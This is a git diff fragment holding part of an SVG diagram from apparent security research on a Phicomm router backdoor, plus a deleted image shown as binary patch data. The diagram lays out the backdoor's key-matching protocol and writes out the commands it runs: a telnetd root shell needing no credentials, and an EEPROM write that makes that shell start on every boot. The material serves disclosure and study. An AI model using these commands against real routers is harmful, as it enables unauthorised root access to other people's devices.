height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1537.5698589239998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1552.6485081239998" width="214.17359104067017" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1415.432800404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">The Client is now expected to append one of two</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">suffixes to </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="183.06781628317185" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="327.3844819325859" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1445.590098804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">- "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="119.66781475729296" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="171.7178139943535" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to launch a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="274.55114987081834" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="334.46781780905076" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> session that will</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1475.747397204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   last until the router is rebooted, </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="italic" font-weight="normal" text-decoration="normal" x="355.36781933492966" y="1475.747397204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">or</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">-  "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="124.33448078817675" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="177.61781361288377" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to write a flag to a physical volume,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   which the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="193.11781170553513" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="321.21781780905076" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon will check for</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1520.983344804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   when the system is rebooted, and launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="425.56781628317185" y="1520.983344804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1536.0619940039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   if it finds it.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1551.1406432039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="239.4178071278984" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="307.9344773549492" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 75.30695738200001 1572.2507520840002 L 143.160878782 1572.2507520840002 L 143.160878782 1591.852996044 L 95.26103649 1591.852996044" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(82.846281982,1591.852996044) translate(-82.846281982,-1591.852996044)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 95.41182298199999 1585.570225544 L 82.846281982 1591.852996044 L 95.41182298199999 1598.135766544 Z"/></g></g><g><g><rect fill="white" stroke="none" x="108.228674802" y="1614.4709698440001" width="352.50692834764646" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="108.228674802" y="1629.549619044" width="221.69026126772096" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="110.490472182" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="210.8404706561211" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="247.8404706561211" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hash of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="311.2238057696465" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="379.7404759966973" y="1628.0417541240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="110.490472182" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="203.49047218200002" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.990472182" y="1643.120403324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 82.846281982 1649.1518630040002 L 150.700203382 1649.1518630040002 L 150.700203382 1668.7541069640001 L 102.80036109000001 1668.7541069640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(90.38560658200001,1668.7541069640001) translate(-90.38560658200001,-1668.7541069640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 102.951147582 1662.4713364640002 L 90.38560658200001 1668.7541069640001 L 102.951147582 1675.036877464 Z"/></g></g><g><g><rect fill="white" stroke="none" x="217.41088641052053" y="1691.3720807640002" width="237.8569268217676" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="219.67268379052052" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="261.3060189040459" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="380.8060189040459" y="1704.9428650440002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 90.38560658200001 1710.974324724 L 569.8783385528086 1710.974324724" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(582.2930930608086,1710.974324724) translate(-582.2930930608086,-1710.974324724)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 569.7275520608085 1704.6915542240001 L 582.2930930608086 1710.974324724 L 569.7275520608085 1717.257095224 Z"/></g></g><g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1733.5922985240002" width="325.9402593603723" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1748.6709477240001" width="310.85692920595335" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1763.7495969240001" width="300.40692224413084" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1778.828246124" width="289.2069214811914" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1793.906895324" width="134.62360086351563" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1808.985544524" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1824.064193724" width="327.1735891333215" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1839.142842924" width="324.89025440126585" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1854.221492124" width="320.2235902777307" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1869.300141324" width="340.8402642241113" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1884.378790524" width="355.54026498705076" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="615.2148104808086" y="1899.4574397239999" width="326.74026193529295" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="617.4766078608086" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="629.3266082422783" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="633.9932747499993" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="753.4932747499993" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="825.9099388735344" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="900.8432732241204" y="1747.1630828040002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="647.3599410669854" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="720.9932723658135" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="904.7932754175713" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="919.143275799041" y="1762.2417320040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">launching an unencrypted </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="814.626601757293" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="874.5432696955254" y="1777.3203812040001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> shell</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="638.7766070978691" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">root</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="673.1932750361016" y="1792.399030404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. No credentials are required to</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1807.477679604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">log into this shell.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1822.556328804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="617.4766078608086" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="629.3266082422783" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="633.9932747499993" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="753.4932747499993" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="825.9099388735344" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="902.0766029970696" y="1837.634978004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="647.3599410669854" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="720.9932723658135" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">iwpriv ra0 e2p 26=7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="918.8266006128838" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="933.1766009943535" y="1852.713627204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">writing the bytes [HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="792.2432704584648" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="829.5766025202324" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">] to </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="859.3599353449395" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">EEPROM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="928.5099368708184" y="1867.792276404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">at offset </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="683.0766063349297" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x26</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="719.7599406855156" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> (virtual address </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="844.0599437372734" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x40026</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="908.7432780878594" y="1882.870925604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">). This</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">code will instruct the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="775.8099361078789" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="903.9099422113945" y="1897.949574804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="617.4766078608086" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="690.5766063349297" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="874.3766093866875" y="1913.0282240039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> on boot.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 597.3717422608086 1919.0596836840002 L 657.6863390608086 1919.0596836840002 L 657.6863390608086 1938.6619276440001 L 609.7864967688085 1938.6619276440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(597.3717422608086,1938.6619276440001) translate(-597.3717422608086,-1938.6619276440001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 609.9372832608086 1932.3791571440001 L 597.3717422608086 1938.6619276440001 L 609.9372832608086 1944.944698144 Z"/></g></g></g><g/><g/></g></svg>
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png b/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
deleted file mode 100644
index bba653b88a06ffe761800e3e158ea2a66680b4ca..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 535389
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
